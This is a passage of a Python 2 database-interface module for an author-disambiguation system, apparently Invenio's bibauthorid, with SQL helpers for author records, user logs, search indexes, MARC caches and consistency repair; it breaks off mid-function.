specified author surname.
@param surname: author surname
@type surname: str
@return: disambiguation algorithm result records ((pid, bibref_table, bibref_value, bibrec),)
@rtype: tuple ((str, str, int, int),)
'''
return run_sql("""select personid, bibref_table, bibref_value, bibrec
from aidRESULTS
where personid like %s""",
(surname + '.%',))
def get_cluster_names(): # get_existing_result_clusters
'''
Gets all cluster names.
@return: cluster names
@rtype: tuple ((str),)
'''
return set(run_sql("""select personid
from aidRESULTS"""))
def duplicated_tortoise_results_exist(): # check_results
'''
It examines if there are duplicated records in the disambiguation algorithm
results (e.g. same signature assigned to two different authors or same
paper assigned to same author more than once).
@return: duplicated records in the disambiguation algorithm results exist
@rtype: bool
'''
duplicated_tortoise_results_not_found = True
disambiguation_results = run_sql("""select personid, bibref_table, bibref_value, bibrec
from aidRESULTS""")
keyfunc = lambda x: x[1:]
disambiguation_results = sorted(disambiguation_results, key=keyfunc)
duplicated_results = [list(sig_holders)
for _, sig_holders in groupby(disambiguation_results, key=keyfunc) if len(list(sig_holders)) > 1]
for duplicates in duplicated_results:
duplicated_tortoise_results_not_found = False
for duplicate in duplicates:
print "Duplicated row in aidRESULTS"
print "%s %s %s %s" % duplicate
print
clusters = dict()
for name, _, _, rec in disambiguation_results:
clusters[name] = clusters.get(name, []) + [rec]
faulty_clusters = dict((name, len(recs) - len(set(recs)))
for name, recs in clusters.items() if not len(recs) == len(set(recs)))
if faulty_clusters:
duplicated_tortoise_results_not_found = False
print "Recids NOT unique in clusters!"
print ("A total of %s clusters hold an average of %.2f duplicates" %
(len(faulty_clusters), (sum(faulty_clusters.values()) / float(len(faulty_clusters)))))
for name in faulty_clusters:
print "Name: %-20s Size: %4d Faulty: %2d" % (name, len(clusters[name]), faulty_clusters[name])
return duplicated_tortoise_results_not_found
#
#
# aidUSERINPUTLOG table ###
#
#
# ********** setters **********#
def insert_user_log(userinfo, pid, action, tag, value, comment='', transactionid=0, timestamp=None, userid=0):
'''
Inserts the user log entry with the specified attributes.
@param userinfo: user identifier and IP (e.g. 29||128.141.29.241)
@type userinfo: str
@param pid: author identifier
@type pid: int
@param action: action
@type action: str
@param tag: tag
@type tag: str
@param value: transaction value
@type value: str
@param comment: comment for the transaction
@type comment: str
@param transactionid: transaction identifier
@type transactionid: int
@param timestamp: entry timestamp
@type timestamp: datetime.datetime
@param userid: user identifier
@type userid: int
@return: transaction identifier
@rtype: int
'''
if timestamp is None:
run_sql("""insert into aidUSERINPUTLOG
(transactionid, timestamp, userinfo, userid, personid, action, tag, value, comment)
values (%s, now(), %s, %s, %s, %s, %s, %s, %s)""",
(transactionid, userinfo, userid, pid, action, tag, value, comment))
else:
run_sql("""insert into aidUSERINPUTLOG
(transactionid, timestamp, userinfo, userid, personid, action, tag, value, comment)
values (%s, %s, %s, %s, %s, %s, %s, %s, %s)""",
(transactionid, timestamp, userinfo, userid, pid, action, tag, value, comment))
return transactionid
# ********** getters **********#
def get_user_logs(transactionid=None, userid=None, userinfo=None, pid=None, action=None, tag=None, value=None, comment=None, only_most_recent=False): # get_user_log
'''
Gets the user log entries with the specified attributes. If no parameters
are given it returns all log entries.
@param transactionid: transaction identifier
@type transactionid: int
@param userid: user identifier
@type userid: int
@param userinfo: user identifier and IP (e.g. 29||128.141.29.241)
@type userinfo: str
@param pid: author identifier
@type pid: int
@param action: action
@type action: str
@param tag: tag
@type tag: str
@param value: transaction value
@type value: str
@param comment: comment for the transaction
@type comment: str
@param only_most_recent: only most recent log entry
@type only_most_recent: bool
@return: log entries ((id, transactionid, timestamp, userinfo, pid, action, tag, value, comment),)
@rtype: tuple ((int, int, datetime.datetime, str, int, str, str, str, str),)
'''
conditions = list()
add_condition = conditions.append
args = list()
add_arg = args.append
if transactionid is not None:
add_condition('transactionid=%s')
add_arg(transactionid)
if userid is not None:
add_condition('userid=%s')
add_arg(userid)
if userinfo is not None:
add_condition('userinfo=%s')
add_arg(str(userinfo))
if pid is not None:
add_condition('pid=%s')
add_arg(pid)
if action is not None:
add_condition('action=%s')
add_arg(str(action))
if tag is not None:
add_condition('tag=%s')
add_arg(str(tag))
if value is not None:
add_condition('value=%s')
add_arg(str(value))
if comment is not None:
add_condition('comment=%s')
add_arg(str(comment))
conditions_str = " and ".join(conditions)
query = """select id, transactionid, timestamp, userinfo, personid, action, tag, value, comment
from aidUSERINPUTLOG
where %s""" % (conditions_str)
if only_most_recent:
query += ' order by timestamp desc limit 0,1'
return run_sql(query, tuple(args))
#
#
# other table ###
#
#
# ********** setters **********#
def set_dense_index_ready():
'''
Sets the search engine dense index ready to use.
'''
run_sql("""insert into aidDENSEINDEX
(flag)
values (%s)""",
(-1,))
def set_inverted_lists_ready():
'''
Sets the search engine inverted lists ready to use.
'''
run_sql("""insert into aidINVERTEDLISTS
(qgram, inverted_list, list_cardinality)
values (%s,%s,%s)""",
('!' * bconfig.QGRAM_LEN, '', 0))
# ********** getters **********#
def get_matching_bibrefs_for_paper(names, rec, always_match=False): # get_possible_bibrecref
'''
Gets the bibrefs which match any of the surnames of the specified names and
are associated with the given paper. If 'always_match' flag is enabled it
gets all bibrefs associated to the given paper.
@param names: author names
@type names: list [str,]
@param rec: paper identifier
@type rec: int
@param always_match: get all bibrefs associated to the given paper
@type always_match: bool
@return: bibrefs [[bibref_table:bibref_value, name],]
@rtype: list [[str, str],]
'''
splitted_names = [split_name_parts(name) for name in names]
bib10x_names = run_sql("""select o.id, o.value
from bib10x o, (select i.id_bibxxx as iid
from bibrec_bib10x i
where id_bibrec=%s) as dummy
where o.tag='100__a'
and o.id=dummy.iid""",
(rec,))
bib70x_names = run_sql("""select o.id, o.value
from bib70x o, (select i.id_bibxxx as iid
from bibrec_bib70x i
where id_bibrec=%s) as dummy
where o.tag='700__a'
and o.id = dummy.iid""",
(rec,))
# bib10x_names = run_sql("""select id, value
# from bib10x
# where tag='100__a'
# and id in (select id_bibxxx
# from bibrec_bib10x
# where id_bibrec=%s)""",
# (rec,) )
# bib70x_names = run_sql("""select id, value
# from bib70x
# where tag='700__a'
# and id in (select id_bibxxx
# from bibrec_bib70x
# where id_bibrec=%s)""",
# (rec,) )
bibrefs = list()
for bib10x_id, bib10x_name in bib10x_names:
splitted_names_bib10x = split_name_parts(bib10x_name)
for n in splitted_names:
if (n[0].lower() == splitted_names_bib10x[0].lower()) or always_match:
bibref = ['100:' + str(bib10x_id), bib10x_name]
if bibref not in bibrefs:
bibrefs.append(bibref)
for bib70x_id, bib70x_name in bib70x_names:
splitted_names_bib70x = split_name_parts(bib70x_name)
for n in splitted_names:
if (n[0].lower() == splitted_names_bib70x[0].lower()) or always_match:
bibref = ['700:' + str(bib70x_id), bib70x_name]
if bibref not in bibrefs:
bibrefs.append(bibref)
return bibrefs
def get_collaborations_for_paper(rec): # get_collaboration
'''
Gets the collaborations which the given paper is associated with.
@param rec: paper identifier
@type rec: int
@return: collaborations
@rtype: list [str,]
'''
bibxxx_ids = run_sql("""select id_bibxxx
from bibrec_bib71x
where id_bibrec=%s""",
(rec,))
if not bibxxx_ids:
return list()
bibxxx_ids_sqlstr = _get_sqlstr_from_set(bibxxx_ids, lambda x: x[0])
collaborations = run_sql("""select value
from bib71x
where id in %s
and tag like '%s'"""
% (bibxxx_ids_sqlstr, "710__g"))
return [c[0] for c in collaborations]
def get_keywords_for_paper(rec): # get_key_words
'''
Gets the keywords which the given paper is associated with.
@param rec: paper identifier
@type rec: int
@return: keywords
@rtype: list [str,]
'''
if bconfig.CFG_ADS_SITE:
bibxxx_ids = run_sql("""select id_bibxxx
from bibrec_bib65x
where id_bibrec=%s""",
(rec,))
else:
bibxxx_ids = run_sql("""select id_bibxxx
from bibrec_bib69x
where id_bibrec=%s""",
(rec,))
if not bibxxx_ids:
return list()
bibxxx_ids_sqlstr = _get_sqlstr_from_set(bibxxx_ids, lambda x: x[0])
if bconfig.CFG_ADS_SITE:
keywords = run_sql("""select value
from bib69x
where id in %s
and tag like '%s'"""
% (bibxxx_ids_sqlstr, "6531_a"))
else:
keywords = run_sql("""select value
from bib69x
where id in %s
and tag like '%s'"""
% (bibxxx_ids_sqlstr, "695__a"))
return [k[0] for k in keywords]
def get_authors_of_paper(rec): # get_all_authors
'''
Gets the authors (including the coauthors) whom the given paper is
associated with.
@param rec: paper identifier
@type rec: int
@return: author identifiers
@rtype: list [int,]
'''
bibxxx10_ids = run_sql("""select id_bibxxx
from bibrec_bib10x
where id_bibrec=%s""",
(rec,))
authors10 = tuple()
if bibxxx10_ids:
bibxxx10_ids_sqlstr = _get_sqlstr_from_set(bibxxx10_ids, lambda x: x[0])
authors10 = run_sql("""select value
from bib10x
where tag='%s'
and id in %s"""
% ('100__a', bibxxx10_ids_sqlstr))
bibxxx70_ids = run_sql("""select id_bibxxx
from bibrec_bib70x
where id_bibrec=%s""",
(rec,))
authors70 = tuple()
if bibxxx70_ids:
bibxxx70_ids_sqlstr = _get_sqlstr_from_set(bibxxx70_ids, lambda x: x[0])
authors70 = run_sql("""select value
from bib70x
where tag='%s'
and id in %s"""
% ('700__a', bibxxx70_ids_sqlstr))
return [a[0] for a in chain(authors10, authors70)]
def get_title_of_paper(rec, recstruct=None): # get_title_from_rec
'''
Gets the title which the specified paper carries.
@param rec: paper identifier
@type rec: int
@return: title
@rtype: str
'''
if not recstruct:
try:
title = get_fieldvalues([rec], '245__a')[0]
return title
except IndexError:
return ""
else:
return record_get_field_value(recstruct, '245', '', '', 'a')
def get_doi_for_paper(recid, recstruct=None): # get_doi_from_rec
'''
Gets the doi which the specified paper is associated with.
@param recid: paper identifier
@type recid: int
@return: doi (e.g. '10.1103/PhysRevD.1.1967')
@rtype: str
'''
if not recstruct:
recstruct = get_record(recid)
inst = record_get_field_instances(recstruct, '024', '%')
dois = list()
for couple in inst:
couple = dict(couple[0])
try:
if couple['2'].lower() == 'doi':
dois.append(couple['a'])
except:
pass
return dois
def get_modified_papers_since(since): # get_recently_modified_record_ids
'''
Gets the papers which have modification date more recent than the specified
one.
@param since: consider only papers which are modified after this date
@type since: datetime.datetime
@return: paper identifiers
@rtype: frozenset frozenset(int,)
'''
modified_recs = run_sql("""select id from bibrec
where modification_date >= %s""",
(since,))
modified_recs = frozenset(rec[0] for rec in modified_recs)
return modified_recs & frozenset(get_all_valid_bibrecs())
def get_modified_papers_before(recs, before): # filter_modified_record_ids
'''
Gets the papers which have modification date older than the specified one
from the given set of papers.
@param recs: paper identifiers
@type recs: list [(_, _, int),]
@param before: consider only papers which are modified before this date
@type before: datetime.datetime
@return: paper identifiers
@rtype: list [int,]
'''
if not recs:
return list()
recs_sqlstr = _get_sqlstr_from_set([rec[2] for rec in recs])
modified_recs = run_sql("""select id from bibrec
where id in %s
and modification_date < '%s'"""
% (recs_sqlstr, before))
modified_recs = [rec[0] for rec in modified_recs]
modified_recs = [rec for rec in recs if rec[2] in modified_recs]
return modified_recs
def _get_author_refs_from_db_of_paper(rec): # _get_authors_from_paper_from_db
'''
Gets all author refs for the specified paper.
@param rec: paper identifier
@type rec: int
@return: author refs
@rtype: tuple ((int),)
'''
ref_ids100 = run_sql("""select id_bibxxx
from bibrec_bib10x
where id_bibrec=%s""",
(rec,))
if not ref_ids100:
return tuple()
ref_ids100_sqlstr = _get_sqlstr_from_set(ref_ids100, lambda x: x[0])
return run_sql("""select id from bib10x
where tag='100__a'
and id in %s"""
% ref_ids100_sqlstr)
def _get_coauthor_refs_from_db_of_paper(rec): # _get_coauthors_from_paper_from_db
'''
@param rec: paper identifier
@type rec: int
@return: coauthor refs
@rtype: tuple ((int),)
'''
ref_ids700 = run_sql("""select id_bibxxx
from bibrec_bib70x
where id_bibrec=%s""",
(rec,))
if not ref_ids700:
return tuple()
ref_ids700_sqlstr = _get_sqlstr_from_set(ref_ids700, lambda x: x[0])
return run_sql("""select id
from bib70x
where tag='700__a'
and id in %s"""
% ref_ids700_sqlstr)
def get_bib10x():
'''
Gets all existing author name identifiers and according values.
@return: name identifiers and according values
@rtype: tuple ((int, str),)
'''
return run_sql("""select id, value
from bib10x
where tag like %s""",
("100__a",))
def get_bib70x():
'''
Gets all existing coauthor name identifiers and according values.
@return: name identifiers and according values
@rtype: tuple ((int, str),)
'''
return run_sql("""select id, value
from bib70x
where tag like %s""",
("700__a",))
def get_user_id_by_email(email):
'''
Gets the user identifier associated with the given email.
@param email: email
@type email: str
@return: user identifier
@rtype: int
'''
try:
uid = run_sql("""select id
from user
where email=%s""", (email,))[0][0]
except IndexError:
uid = None
return uid
def get_name_variants_for_authors(authors): # get_indexable_name_personids
'''
Gets the real author name and the author identifiers (which carry that
name) associated to each of the specified indexable name identifiers.
@param name_ids: indexable name identifiers
@type name_ids: list [int,]
@return: real author name and the author identifiers which carry that name ((name, pids),)
@rtype: tuple ((str, bytes),)
'''
name_variants = []
if len(authors):
name_variants = run_sql("""select id, personids
from aidDENSEINDEX
where id in %s
and flag=1"""
% _get_sqlstr_from_set(authors))
authors = list()
author_to_name_variants_mapping = dict()
for author, names in name_variants:
authors.append(author)
author_to_name_variants_mapping[author] = deserialize(names)
assert len(authors) == len(set(authors))
return author_to_name_variants_mapping
def get_author_groups_from_string_ids(indexable_name_ids): # get_indexable_name_personids
'''
Gets the real author name and the author identifiers (which carry that
name) associated to each of the specified indexable name identifiers.
@param name_ids: indexable name identifiers
@type name_ids: list [int,]
@return: real author name and the author identifiers which carry that name ((name, pids),)
@rtype: tuple ((str, bytes),)
'''
return run_sql("""select personids
from aidDENSEINDEX
where id in %s
and flag=0"""
% _get_sqlstr_from_set(indexable_name_ids))
def get_indexed_strings(string_ids): # get_indexable_name_personids
'''
Gets the real author name and the author identifiers (which carry that
name) associated to each of the specified indexable name identifiers.
@param name_ids: indexable name identifiers
@type name_ids: list [int,]
@return: real author name and the author identifiers which carry that name ((name, pids),)
@rtype: tuple ((str, bytes),)
'''
strings = run_sql("""select id, indexable_string, indexable_surname
from aidDENSEINDEX
where id in %s
and flag=0"""
% (_get_sqlstr_from_set(string_ids),))
strings_to_ids_mapping = dict()
for sid, string, surname in strings:
strings_to_ids_mapping[string] = {'sid': sid, 'surname': surname}
return strings_to_ids_mapping
def _get_grouped_records_from_db(sig, *args):
'''
Gets the records from bibmarcx table which are grouped together with the
paper specified in the given signature and carry a tag from 'args'.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (str, str, str)
@param args: tags
@type args: tuple (str,)
@return: {tag: [extracted_value,]}
@rtype: dict {str: [str,]}
'''
table, ref, rec = sig
target_table = "bib%sx" % (str(table)[:-1])
mapping_table = "bibrec_%s" % target_table
group_id = run_sql("""select field_number
from %s
where id_bibrec=%s
and id_bibxxx=%s"""
% (mapping_table, rec, ref))
if not group_id:
# the mapping is not found
return dict((tag, list()) for tag in args)
elif len(group_id) == 1:
field_number = group_id[0][0]
else:
# ignore the error
field_number = min(i[0] for i in group_id)
grouped = run_sql("""select id_bibxxx
from %s
where id_bibrec=%s
and field_number=%s"""
% (mapping_table, rec, field_number))
assert len(grouped) > 0, "There should be at most one grouped value per tag."
grouped_sqlstr = _get_sqlstr_from_set(grouped, lambda x: str(x[0]))
res = dict()
for tag in args:
values = run_sql("""select value
from %s
where tag like '%%%s%%'
and id in %s"""
% (target_table, tag, grouped_sqlstr))
res[tag] = [value[0] for value in values]
return res
def get_signatures_from_bibrefs(bibrefs):
'''
Gets all valid signatures for the given bibrefs.
@param bibrefs: bibrefs set((bibref_table, bibref_value),)
@type bibrefs: set set((int, int),)
@return: signatures ((bibref_table, bibref_value, bibrec),)
@rtype: iterator ((int, int, int),)
'''
sig10x = tuple()
bib10x = filter(lambda x: x[0] == 100, bibrefs)
if bib10x:
bib10x_sqlstr = _get_sqlstr_from_set(bib10x, lambda x: x[1])
sig10x = run_sql("""select 100, id_bibxxx, id_bibrec
from bibrec_bib10x
where id_bibxxx in %s"""
% bib10x_sqlstr)
sig70x = tuple()
bib70x = filter(lambda x: x[0] == 700, bibrefs)
if bib70x:
bib70x_sqlstr = _get_sqlstr_from_set(bib70x, lambda x: x[1])
sig70x = run_sql("""select 700, id_bibxxx, id_bibrec
from bibrec_bib70x
where id_bibxxx in %s"""
% bib70x_sqlstr)
valid_recs = set(get_all_valid_bibrecs())
return filter(lambda x: x[2] in valid_recs, chain(set(sig10x), set(sig70x)))
def get_resolved_affiliation(ambiguous_aff): # resolve_affiliation
"""
This is a method available in the context of author disambiguation in ADS
only. No other platform provides the table used by this function.
@warning: to be used in an ADS context only
@param ambiguous_aff_string: ambiguous affiliation
@type ambiguous_aff_string: str
@return: the normalized version of the affiliation
@rtype: str
"""
if not ambiguous_aff or not bconfig.CFG_ADS_SITE:
return "None"
aff_id = run_sql("""select aff_id
from ads_affiliations
where affstring=%s""",
(ambiguous_aff,))
if not aff_id:
return "None"
return aff_id[0][0]
def _get_name_from_db_by_bibref(bibref): # _get_name_by_bibrecref_from_db
'''
Gets the author name which is associated with the given bibref.
@param bibref: bibref (bibref_table, bibref_value)
@type bibref: tuple (int, int)
@return: name
@rtype: str
'''
table = "bib%sx" % str(bibref[0])[:-1]
tag = "%s__a" % bibref[0]
ref = bibref[1]
query = """select value
from %s
where id=%s
and tag='%s'""" % (table, ref, tag)
name = run_sql(query)
assert len(name) == 1, "A bibref must have exactly one name (%s)" % str(ref)
return name[0][0]
def get_deleted_papers():
'''
Gets all deleted papers.
@return: paper identifiers
@rtype: tuple ((int),)
'''
return run_sql("""select o.id_bibrec
from bibrec_bib98x o, (select i.id as iid
from bib98x i
where value = 'DELETED'
and tag like '980__a') as dummy
where o.id_bibxxx = dummy.iid""")
def get_inverted_lists(qgrams):
'''
Gets the inverted lists for the specified qgrams.
@param qgrams: contiguous sequences of q chars
@type qgrams: list [str,]
@return: inverted lists and their cardinality
@rtype: tuple ((bytes, int),)
'''
return run_sql("""select inverted_list, list_cardinality
from aidINVERTEDLISTS
where qgram in %s"""
% _get_sqlstr_from_set(qgrams, f=lambda x: "'%s'" % x))
def populate_partial_marc_caches(selected_bibrecs=None, verbose=True, create_inverted_dicts=False):
'''
Populates marc caches.
'''
global MARC_100_700_CACHE
def br_dictionarize(maptable, md):
gc.disable()
maxiters = len(set(map(itemgetter(0), maptable)))
for i, v in enumerate(groupby(maptable, itemgetter(0))):
if i % 10000 == 0:
logger.update_status(float(i) / maxiters, 'br_dictionarizing...')
idx = defaultdict(list)
fn = defaultdict(list)
for _, k, z in v[1]:
idx[k].append(z)
fn[z].append(k)
md[v[0]] = {'id': dict(idx), 'fn': dict(fn)}
logger.update_status_final('br_dictionarizing done')
gc.enable()
return md
def bib_dictionarize_in_batches(bibtable, bd):
bd.update(((i[0], (i[1], i[2])) for i in bibtable))
return bd
def bib_dictionarize(bibtable):
return dict((i[0], (i[1], i[2])) for i in bibtable)
sl = 500
logger.update_status(.0, 'Populating cache, 10x')
if selected_bibrecs is None:
bibrecs = list(set(x[0] for x in run_sql("select distinct(id_bibrec) from bibrec_bib10x")))
else:
bibrecs = selected_bibrecs
# If there is nothing to cache, stop here
if not bibrecs:
return
if MARC_100_700_CACHE:
bibrecs = set(bibrecs) - MARC_100_700_CACHE['records']
# we add to the cache only the missing records. If nothing is missing, go away.
if not bibrecs:
return
MARC_100_700_CACHE['records'] |= set(bibrecs)
else:
MARC_100_700_CACHE = dict()
MARC_100_700_CACHE['records'] = set(bibrecs)
bibrecs = list(bibrecs)
# bibrecs.sort()
bibrecs = [bibrecs[x:x + sl] for x in range(0, len(bibrecs), sl)]
if 'brb100' in MARC_100_700_CACHE:
brd_b10x = MARC_100_700_CACHE['brb100']
else:
brd_b10x = dict()
for i, bunch in enumerate(bibrecs):
logger.update_status(float(i) / len(bibrecs), '10x population bunching...')
bibrec_bib10x = run_sql("select id_bibrec, id_bibxxx, field_number"
" from bibrec_bib10x where id_bibrec in %s "
% _get_sqlstr_from_set(bunch))
bibrec_bib10x = sorted(bibrec_bib10x, key=lambda x: x[0])
brd_b10x = br_dictionarize(bibrec_bib10x, brd_b10x)
del bibrec_bib10x
logger.update_status(.25, 'Populating cache, 70x')
if not selected_bibrecs:
bibrecs = list(set(x[0] for x in run_sql("select distinct(id_bibrec) from bibrec_bib70x")))
bibrecs = [bibrecs[x:x + sl] for x in range(0, len(bibrecs), sl)]
if 'brb700' in MARC_100_700_CACHE:
brd_b70x = MARC_100_700_CACHE['brb700']
else:
brd_b70x = dict()
for i, bunch in enumerate(bibrecs):
logger.update_status(float(i) / len(bibrecs), '70x population bunching...')
bibrec_bib70x = run_sql("select id_bibrec, id_bibxxx, field_number"
" from bibrec_bib70x where id_bibrec in %s "
% _get_sqlstr_from_set(bunch))
bibrec_bib70x = sorted(bibrec_bib70x, key=lambda x: x[0])
brd_b70x = br_dictionarize(bibrec_bib70x, brd_b70x)
del bibrec_bib70x
logger.update_status(.5, 'Populating get_grouped_records_table_cache')
if 'b100' in MARC_100_700_CACHE:
bibd_10x = MARC_100_700_CACHE['b100']
else:
bibd_10x = dict()
logger.update_status(.625, 'Populating get_grouped_records_table_cache')
if selected_bibrecs:
for i, bunch in enumerate(bibrecs):
bib10x = (run_sql("select id, tag, value"
" from bib10x, bibrec_bib10x where id=id_bibxxx "
" and id_bibrec in %s" % _get_sqlstr_from_set(bunch)))
bibd_10x = bib_dictionarize_in_batches(bib10x, bibd_10x)
else:
bib10x = (run_sql("select id, tag, value"
" from bib10x"))
bibd_10x = bib_dictionarize(bib10x)
del bib10x
if 'b700' in MARC_100_700_CACHE:
bibd_70x = MARC_100_700_CACHE['b700']
else:
bibd_70x = dict()
logger.update_status(.75, 'Populating get_grouped_records_table_cache')
if selected_bibrecs:
for i, bunch in enumerate(bibrecs):
bib70x = (run_sql("select id, tag, value"
" from bib70x, bibrec_bib70x where id=id_bibxxx"
" and id_bibrec in %s" % _get_sqlstr_from_set(bunch)))
bibd_70x = bib_dictionarize_in_batches(bib70x, bibd_70x)
else:
bib70x = (run_sql("select id, tag, value"
" from bib70x"))
bibd_70x = bib_dictionarize(bib70x)
del bib70x
logger.update_status_final('Finished populating get_grouped_records_table_cache')
MARC_100_700_CACHE['brb100'] = brd_b10x
MARC_100_700_CACHE['brb700'] = brd_b70x
MARC_100_700_CACHE['b100'] = bibd_10x
MARC_100_700_CACHE['b700'] = bibd_70x
if (create_inverted_dicts or 'inverted_b100' in MARC_100_700_CACHE):
#MARC_100_700_CACHE['reversed_b100'] = dict((v,k) for k,v in MARC_100_700_CACHE['b100'].items())
MARC_100_700_CACHE['inverted_b100'] = dict(izip(MARC_100_700_CACHE['b100'].itervalues(), MARC_100_700_CACHE['b100'].iterkeys()))
#MARC_100_700_CACHE['reversed_b700'] = dict((v,k) for k,v in MARC_100_700_CACHE['b700'].items())
MARC_100_700_CACHE['inverted_b700'] = dict(izip(MARC_100_700_CACHE['b700'].itervalues(), MARC_100_700_CACHE['b700'].iterkeys()))
def create_lookup_dict(brb):
b = defaultdict(set)
for k,v in brb.iteritems():
for identifier in v['id'].iterkeys():
b[identifier].add(k)
return dict(b)
MARC_100_700_CACHE['b100_id_recid_lookup_table'] = create_lookup_dict(MARC_100_700_CACHE['brb100'])
MARC_100_700_CACHE['b700_id_recid_lookup_table'] = create_lookup_dict(MARC_100_700_CACHE['brb700'])
def search_engine_is_operating(): ### check_search_engine_status
'''
Examines if the bibauthorid search engine is operating.
@return: bibauthorid search engine is operating
@rtype: bool
'''
dense_index_exists = bool(run_sql("""select *
from aidDENSEINDEX
where flag=%s""",
(-1,)))
inverted_lists_exists = bool(run_sql("""select *
from aidINVERTEDLISTS
where qgram=%s""",
('!' * bconfig.QGRAM_LEN,)))
if dense_index_exists and inverted_lists_exists:
return True
return False
def _truncate_table(table_name):
'''
Truncates the specified table.
@param table_name: name of the table to truncate
@type table_name: str
'''
run_sql('truncate %s' % table_name)
def flush_data_to_db(table_name, column_names, args): # flush_data
'''
Flushes the given data in the specified table with the specified columns.
@param table_name: name of the table
@type table_name: str
@param column_names: names of the columns
@type column_names: list [str,]
@param args: data to flush in the database
@type args: list
'''
column_num = len(column_names)
assert len(
args) % column_num == 0, 'Trying to flush data in table %s. Wrong number of arguments passed.' % table_name
values_sqlstr = "(%s)" % ", ".join(repeat("%s", column_num))
multiple_values_sqlstr = ", ".join(repeat(values_sqlstr, len(args) / column_num))
insert_query = 'insert into %s (%s) values %s' % (table_name, ", ".join(column_names), multiple_values_sqlstr)
run_sql(insert_query, args)
#
#
# no table ###
#
#
def create_new_author_by_signature(sig, name=None, m_name=None): # new_person_from_signature
'''
Creates a new author and associates him with the given signature.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param name: author name
@type name: str
@return: author identifier
@rtype: int
'''
pid = get_free_author_id()
add_signature(sig, name, pid, m_name=m_name)
return pid
def check_author_paper_associations(output_file=None): # check_personid_papers
'''
It examines if there are records in aidPERSONIDPAPERS table which are in an
impaired state. If 'output_file' is specified it writes the output in that
file, otherwise in stdout.
@param output_file: file to write output
@type output_file: str
@return: damaged records are found
@rtype: bool
'''
if output_file:
fp = open(output_file, "w")
printer = lambda x: fp.write(x + '\n')
else:
printer = logger.log
checkers = (wrong_names_exist,
duplicated_conirmed_papers_exist,
duplicated_confirmed_signatures_exist,
impaired_rejections_exist,
impaired_canonical_names_exist,
empty_authors_exist
# check_claim_inspireid_contradiction
)
# avoid writing f(a) or g(a), because one of the calls might be optimized
return not any([check(printer) for check in checkers])
def repair_author_paper_associations(output_file=None): # repair_personid
'''
It examines if there are records in aidPERSONIDPAPERS table which are in an
impaired state and repairs them. If 'output_file' is specified it writes
the output in that file, otherwise in stdout.
@param output_file: file to write output
@type output_file: str
@return: damaged records are found even after the repairing
@rtype: bool
'''
if output_file:
fp = open(output_file, "w")
printer = lambda x: fp.write(x + '\n')
else:
printer = logger.log
checkers = (wrong_names_exist,
duplicated_conirmed_papers_exist,
duplicated_confirmed_signatures_exist,
impaired_rejections_exist,
impaired_canonical_names_exist,
empty_authors_exist
# check_claim_inspireid_contradiction
)
first_check = [check(printer) for check in checkers]
repair_pass = [check(printer, repair=True) for check in checkers]
last_check = [check(printer) for check in checkers]
if any(first_check):
assert any(repair_pass)
assert not any(last_check)
return not any(last_check)
def get_author_refs_of_paper(rec): # get_authors_from_paper
'''
Gets all author refs for the specified paper.
@param rec: paper identifier
@type rec: int
@return: author refs
@rtype: list [(str),]
'''
if MARC_100_700_CACHE:
return _get_author_refs_from_marc_caches_of_paper(rec)
else:
return _get_author_refs_from_db_of_paper(rec)
def _get_author_refs_from_marc_caches_of_paper(rec): # _get_authors_from_paper_from_cache
'''
Gets all author refs for the specified paper (from marc caches).
If author refs are not found in marc caches, the database is queried.
@param rec: paper identifier
@type rec: int
@return: author refs
@rtype: list [(str),]
'''
try:
ids = MARC_100_700_CACHE['brb100'][rec]['id'].keys()
refs = [i for i in ids if '100__a' in MARC_100_700_CACHE['b100'][i][0]]
except KeyError:
if rec in MARC_100_700_CACHE['records']:
refs = tuple()
else:
return _get_author_refs_from_db_of_paper(rec)
return tuple(zip(refs))
def get_coauthor_refs_of_paper(paper): # get_coauthors_from_paper
'''
Gets all coauthor refs for the specified paper.
@param rec: paper identifier
@type rec: int
@return: coauthor refs
@rtype: list [(str),]
'''
if MARC_100_700_CACHE:
return _get_coauthor_refs_from_marc_caches_of_paper(paper)
else:
return _get_coauthor_refs_from_db_of_paper(paper)
def _get_coauthor_refs_from_marc_caches_of_paper(rec): # _get_coauthors_from_paper_from_cache
'''
Gets all coauthor refs for the specified paper (from marc caches).
@param rec: paper identifier
@type rec: int
@return: coauthor refs
@rtype: list [(str),]
'''
try:
ids = MARC_100_700_CACHE['brb700'][rec]['id'].keys()
refs = [i for i in ids if '700__a' in MARC_100_700_CACHE['b700'][i][0]]
except KeyError:
if rec in MARC_100_700_CACHE['records']:
refs = tuple()
else:
return _get_coauthor_refs_from_db_of_paper(rec)
return tuple(zip(refs))
def get_all_bibrefs_of_paper(rec):
'''
Gets all author and coauthor refs for the specified paper.
@param rec: paper identifier
@type rec: int
@return: author and coauthor refs [(table, ref),]
@rtype: list [(int, str),]
'''
author_refs = [(100, x[0]) for x in get_author_refs_of_paper(rec)]
coauthor_refs = [(700, x[0]) for x in get_coauthor_refs_of_paper(rec)]
return author_refs + coauthor_refs
def get_all_signatures_of_paper(rec):
'''
Gets all existing signatures for the specified paper.
@param rec: paper identifier
@type rec: int
@return: existing signatures {name: bibref}
@rtype: dict {str: str}
'''
signatures = list()
refs = get_all_bibrefs_of_paper(rec)
for table, ref in refs:
marc_tag = str(table) + '__a'
sig = get_grouped_records((table, ref, rec), marc_tag)[marc_tag][0]
bibref = str(table) + ':' + str(ref)
signatures.append({"bibref": bibref, "sig": sig})
return signatures
def _get_name_by_bibref_from_cache(ref): # _get_name_by_bibrecref_from_cache
'''
Finds the author name from cache based on the given bibref.
@param ref: bibref (bibref_table, bibref_value)
@type ref: tuple (int, int)
@return: name
@rtype: str
'''
table = "b%s" % ref[0]
refid = ref[1]
tag = "%s__a" % ref[0]
name = None
try:
if tag in MARC_100_700_CACHE[table][refid][0]:
name = MARC_100_700_CACHE[table][refid][1]
except (KeyError):
name = _get_name_from_db_by_bibref(ref)
return name
def get_inspire_id_of_signature(sig): # get_inspire_id
'''
Gets the external identifier of Inspire system for the given signature.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@return: Inspire external identifier
@rtype: list [str]
'''
table, ref, rec = sig
return get_grouped_records((str(table), ref, rec), str(table) + '__i').values()[0]
def get_orcid_id_of_signature(sig):
"""
Gets the external identifier of ORCID system for the given signature.
The fields to check are either '100__j' and '100__k' or '700__j' and '700__k'
and the prefix is 'ORCID:'
@param sig: signature (bibref_table, bibref_value, bibrec)
type sig: tuple (int, int, int)
@return Orcid external identifier
@rtype: str
"""
table, ref, rec = sig
